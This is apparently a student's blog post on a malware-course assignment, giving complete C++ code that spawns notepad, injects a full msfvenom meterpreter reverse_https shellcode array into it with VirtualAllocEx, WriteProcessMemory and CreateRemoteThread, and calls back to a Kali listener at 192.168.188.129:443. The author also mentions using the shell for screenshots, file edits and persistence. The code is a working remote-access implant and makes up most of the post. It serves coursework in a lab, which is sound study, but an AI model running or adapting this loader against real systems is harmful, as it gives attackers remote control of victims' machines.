Skip to main content
  1. Classwork/

Metasploitable C2

·565 words·3 mins
DFOR 740 Malware - This article is part of a series.
Part 1: This Article
This article series is actively being worked on. Expect updates soon, specifically about Mythic C2, Cookie Stealers, and DLL search order hijacking
This was one of the coolest school assignments I’ve ever done.

Background
#

The homework assignment was as follows:

Your homework is to inject shellcode into a REMOTE PROCESS on your Windows VM, and catch the shell from Kali. You will need to utilize Windows 32 APIs to do this. You will need to submit the code you used to run this (NOTE DO NOT SUBMIT THE SHELLCODE IN YOUR CODE, AS AV MIGHT HAVE A FIT), as well as a video of yourself generating the shellcode on kali, compiling the code + running the code on windows, and catching your shell on your kali virtual machine. Please also run a command on kali to show you have command access on the Windows host.

Please narrate your video, explaining the steps you are taking, which API functions you used, and the commands you ran (and why you ran them).

Demonstration
#

I made a video for some family members to show at a high level what the malware does. The link to that youtube video is here.

Outcome
#

I was able to compile a C++ executable that, when launched, spawned a notepad process, injected malicious code, and created a reverse connected back to my Kali Linux box. Importantly, this malware is very simple, and would be quickly flagged by most modern EDR solutions due to the EXECUTE_READWRITE memory permissions. A way I could potentially get around that is by first creating the memory write and read only, add my malicious payload, and then change it to only read and execute.

Once the reverse shell was connected, I used it to take screenshots of the victim machine’s desktop, edit files and add persistence.

Project Code
#

The code, available here, is:

#include <Windows.h>
#include <cstdio>
//this is the main function, and it is able to take any number of arguments. the arguments will be put into the array argv
int main(int argc, char* argv[])
{
	/*
	this shellcode is the malicious C code created by msfvenom on kali with the
	options:
	-p windows/x64/meterpreter/reverse_https LPORT=443 LHOST=192.168.188.129 -f c
	*/
	unsigned char shellcode[893] =
		"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
		"\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
		"\x8b\x52\x20\x51\x56\x48\x8b\x72\x50\x4d\x31\xc9\x48\x0f"
		"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
		"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
		"\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
		"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
		"\x74\x67\x48\x01\xd0\x8b\x48\x18\x44\x8b\x40\x20\x50\x49"
		"\x01\xd0\xe3\x56\x48\xff\xc9\x4d\x31\xc9\x41\x8b\x34\x88"
		"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
		"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
		"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
		"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
		"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
		"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
		"\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e"
		"\x69\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c"
		"\x77\x26\x07\xff\xd5\x53\x53\xe8\x77\x00\x00\x00\x4d\x6f"
		"\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4d\x61\x63"
		"\x69\x6e\x74\x6f\x73\x68\x3b\x20\x49\x6e\x74\x65\x6c\x20"
		"\x4d\x61\x63\x20\x4f\x53\x20\x58\x20\x31\x34\x5f\x37\x5f"
		"\x32\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74"
		"\x2f\x36\x30\x35\x2e\x31\x2e\x31\x35\x20\x28\x4b\x48\x54"
		"\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f"
		"\x29\x20\x56\x65\x72\x73\x69\x6f\x6e\x2f\x31\x37\x2e\x34"
		"\x2e\x31\x20\x53\x61\x66\x61\x72\x69\x2f\x36\x30\x35\x2e"
		"\x31\x2e\x31\x35\x00\x59\x53\x5a\x4d\x31\xc0\x4d\x31\xc9"
		"\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00\x00\x00\xff\xd5"
		"\xe8\x10\x00\x00\x00\x31\x39\x32\x2e\x31\x36\x38\x2e\x31"
		"\x38\x38\x2e\x31\x32\x39\x00\x5a\x48\x89\xc1\x49\xc7\xc0"
		"\xbb\x01\x00\x00\x4d\x31\xc9\x53\x53\x6a\x03\x53\x49\xba"
		"\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\xd5\xe8\x64\x00\x00"
		"\x00\x2f\x77\x4e\x4e\x49\x7a\x76\x48\x34\x76\x33\x37\x71"
		"\x72\x4f\x75\x75\x67\x7a\x33\x44\x6d\x51\x55\x4d\x66\x70"
		"\x67\x33\x57\x78\x75\x50\x57\x6a\x67\x58\x7a\x62\x5a\x2d"
		"\x53\x56\x67\x69\x4f\x51\x46\x78\x4c\x4f\x71\x46\x2d\x56"
		"\x39\x57\x63\x45\x67\x4a\x6f\x42\x67\x64\x6d\x35\x50\x34"
		"\x76\x74\x4a\x5f\x68\x6e\x52\x55\x79\x2d\x75\x52\x71\x46"
		"\x57\x38\x79\x71\x71\x4a\x4f\x61\x39\x65\x73\x30\x6d\x64"
		"\x63\x35\x00\x48\x89\xc1\x53\x5a\x41\x58\x4d\x31\xc9\x53"
		"\x48\xb8\x00\x32\xa8\x84\x00\x00\x00\x00\x50\x53\x53\x49"
		"\xc7\xc2\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x6a\x0a\x5f"
		"\x48\x89\xf1\x6a\x1f\x5a\x52\x68\x80\x33\x00\x00\x49\x89"
		"\xe0\x6a\x04\x41\x59\x49\xba\x75\x46\x9e\x86\x00\x00\x00"
		"\x00\xff\xd5\x4d\x31\xc0\x53\x5a\x48\x89\xf1\x4d\x31\xc9"
		"\x4d\x31\xc9\x53\x53\x49\xc7\xc2\x2d\x06\x18\x7b\xff\xd5"
		"\x85\xc0\x75\x1f\x48\xc7\xc1\x88\x13\x00\x00\x49\xba\x44"
		"\xf0\x35\xe0\x00\x00\x00\x00\xff\xd5\x48\xff\xcf\x74\x02"
		"\xeb\xaa\xe8\x55\x00\x00\x00\x53\x59\x6a\x40\x5a\x49\x89"
		"\xd1\xc1\xe2\x10\x49\xc7\xc0\x00\x10\x00\x00\x49\xba\x58"
		"\xa4\x53\xe5\x00\x00\x00\x00\xff\xd5\x48\x93\x53\x53\x48"
		"\x89\xe7\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\x00\x20\x00"
		"\x00\x49\x89\xf9\x49\xba\x12\x96\x89\xe2\x00\x00\x00\x00"
		"\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb2\x66\x8b\x07\x48"
		"\x01\xc3\x85\xc0\x75\xd2\x58\xc3\x58\x6a\x00\x59\x49\xc7"
		"\xc2\xf0\xb5\xa2\x56\xff\xd5";
		//this is basically creating the variables that we will use
	HANDLE processHandle;
	HANDLE remoteThread;
	PVOID remoteBuffer;
	/*
	This is the old code from the example, it takes the PID to inject to as anargument and prints out the PID.
	printf("Injecting to PID: %i", atoi(argv[1]));
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
	*/
	//lambda function that creates notepad.exe, passes in startup info and outputs process info
	STARTUPINFOW si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcessW(L"C:\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si,& pi);
	wprintf(L"PID of injected Notepad: %lu\n", pi.dwProcessId);

	//handle of created process is available at pi.hProcess
	remoteBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof shellcode,(MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess, remoteBuffer, shellcode, sizeof shellcode,NULL);
	remoteThread = CreateRemoteThread(pi.hProcess, NULL, 0,(LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return 0;
}

Code Template
#

The template for this assigment was ired.team’s post about this.

Hiller Hoover
Author
Hiller Hoover
DFOR 740 Malware - This article is part of a series.
Part 1: This Article